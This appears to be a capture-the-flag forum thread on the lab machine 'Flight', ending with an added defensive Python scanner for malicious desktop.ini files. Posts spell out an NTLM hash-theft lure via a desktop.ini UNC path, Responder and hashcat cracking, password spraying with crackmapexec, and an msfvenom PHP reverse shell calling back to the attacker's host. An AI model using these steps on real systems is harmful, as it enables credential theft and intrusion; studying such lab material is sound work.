Posts: 21 Threads: 0 Joined: N/A
November 6, 2022 at 3:21 PM

(November 6, 2022, 03:13 PM)loge23 Wrote: (November 6, 2022, 02:55 PM)kujen5 Wrote: (November 6, 2022, 02:46 PM)yumi Wrote: (November 6, 2022, 02:05 PM)kujen5 Wrote:
I have another question, how do we generate c.bum hash? i understood the ntlm theft method and the use of responder, but it didnt generate the hash for me, can i get some help
(November 5, 2022, 09:22 PM)may123a Wrote: Tikkycoll_431012284 (c.bum)
how did u get the passwd

it as already informed here how to get the hash of c.brum:
create a desktop.ini
echo "[.ShellClassInfo]" > desktop.ini
echo IconResource=\\YOUIP\aa >> desktop.ini
upload on \\Shared
smbmap -H flight.htb -u S.MOON -p 'Password' --upload desktop.ini Shared\\desktop.ini\\
responder -I tun0 -v
after that
hashcat -m 5600 hashes.txt rockyou.txt
echo echo IconResource=\\1.2.3.4\aa >> desktop.ini

actually i was talking also about the S.Moon user password source since i wasnt able to find it and also i did the steps u just said and responder didnt return anything :/

(November 5, 2022, 11:22 PM)loge23 Wrote:
crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users
save users to file
crackmapexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd 'S@Ss!K@*t13' came from.

Posts: 166 Threads: 0 Joined: N/A
November 6, 2022 at 3:24 PM

(November 6, 2022, 03:21 PM)kujen5 Wrote:
You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd 'S@Ss!K@*t13' came from.

from svc_apache first step with SSRF

Posts: 21 Threads: 0 Joined: N/A
November 6, 2022 at 3:29 PM

(November 6, 2022, 03:24 PM)yumi Wrote: (November 6, 2022, 03:21 PM)kujen5 Wrote:
You are using the 'S@Ss!K@*t13' password to execute the first command, but my question is where that passwd 'S@Ss!K@*t13' came from.
from svc_apache first step with SSRF

and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that?

Posts: 11 Threads: 0 Joined: N/A
November 6, 2022 at 3:34 PM

(November 6, 2022, 03:29 PM)kujen5 Wrote:
and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that?

browse the .ini file in your browser

Posts: 28 Threads: 0 Joined: N/A
November 6, 2022 at 3:35 PM

(November 6, 2022, 03:29 PM)kujen5 Wrote:
and about why the responder didnt return any hash after i uploaded the desktop.ini, do you have any idea on how to fix that?

Try rebooting your box, wasn't working for me either for a while. After uploading the desktop.ini lure I captured the hash with 'impacket-smbserver -smb2support share .' But responder should work just as well. No need to trigger the user, must be an automated script on the box that opens explorer or something to trigger the auth.

Posts: 45 Threads: 0 Joined: N/A
November 6, 2022 at 3:50 PM

Anyone have idea after getting a reverse shell as svc_apache?

Posts: 21 Threads: 0 Joined: N/A
November 6, 2022 at 3:54 PM

any hint on the ssrf for foothold?
(November 6, 2022, 03:50 PM)hacker9999 Wrote: Anyone have idea after getting a reverse shell as svc_apache?
how did you get a reverse shell

Posts: 45 Threads: 0 Joined: N/A
November 6, 2022 at 4:16 PM

casga
try to have revshell from \\Web. I'm trying too
msfvenom -p php/reverse_php LHOST=10.10.14.X LPORT=9978 -o shell.php
upload on C.Bum \\Web and set an listener on LPORT
Browse school.url.htb/shell.php

Posts: 21 Threads: 0 Joined: N/A
November 6, 2022 at 4:24 PM

(November 6, 2022, 04:16 PM)hacker9999 Wrote:
casga
try to have revshell from \\Web. I'm trying too
msfvenom -p php/reverse_php LHOST=10.10.14.X LPORT=9978 -o shell.php
upload on C.Bum \\Web and set an listener on LPORT
Browse school.url.htb/shell.php

my problem is how they got the 'S@Ss!K@*t13' password in the first place.. i have no clue about the ssrf and then after getting this passwd how'd they get the c.bum hash, since when uploading desktop.ini to shared on S.Moon it gives you the hash to S.Moon not c.bum

Posts: 166 Threads: 0 Joined: N/A
November 6, 2022 at 4:25 PM

i get my php file deleted an shell crash in 1 minute.
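
The desktop.ini lure discussed earlier in this thread works because the folder's IconResource value is resolved when the folder is displayed, so a UNC path there makes the viewing account authenticate to the named host. A defender-side check for that pattern on a writable share, as an added example that is not part of any post in the thread; the function names, the allow-list parameter and the sample files are constructed for illustration:

```python
import re
import tempfile
from pathlib import Path

# desktop.ini keys whose value Explorer resolves as an icon path.
ICON_KEYS = {"iconresource", "iconfile"}
# Matches \\host\... or //host/...; group 1 is the host.
UNC_RE = re.compile(r'^"?(?:\\\\|//)([^\\/\s"]+)[\\/]')

def decode_ini(raw: bytes) -> str:
    """desktop.ini is often UTF-16 with a BOM; otherwise treat as UTF-8."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def remote_icon_refs(text, allowed_hosts=frozenset()):
    """Return (key, host, value) for each icon key pointing at a UNC host."""
    hits = []
    for line in text.splitlines():
        key, sep, value = (p.strip() for p in line.partition("="))
        m = UNC_RE.match(value)
        if sep and key.lower() in ICON_KEYS and m:
            if m.group(1).lower() not in allowed_hosts:
                hits.append((key, m.group(1), value))
    return hits

def scan_tree(root, allowed_hosts=frozenset()):
    """Walk a mounted copy of a share; map each flagged file to its hits."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name.lower() == "desktop.ini":
            hits = remote_icon_refs(decode_ini(path.read_bytes()), allowed_hosts)
            if hits:
                findings[str(path)] = hits
    return findings

def demo():
    """Constructed sample tree: one lure-style file and one benign file."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("Shared", "Docs"):
            (Path(d) / name).mkdir()
        (Path(d) / "Shared" / "desktop.ini").write_text(
            "[.ShellClassInfo]\nIconResource=\\\\192.0.2.10\\aa\n")
        (Path(d) / "Docs" / "Desktop.ini").write_bytes(
            "[.ShellClassInfo]\r\nIconResource=C:\\Windows\\System32\\shell32.dll,4\r\n".encode("utf-16"))
        return {Path(p).parent.name: h for p, h in scan_tree(d).items()}
```

Blocking outbound SMB (TCP 445) at the network edge and restricting who can write to shared folders address the same exposure from the other side.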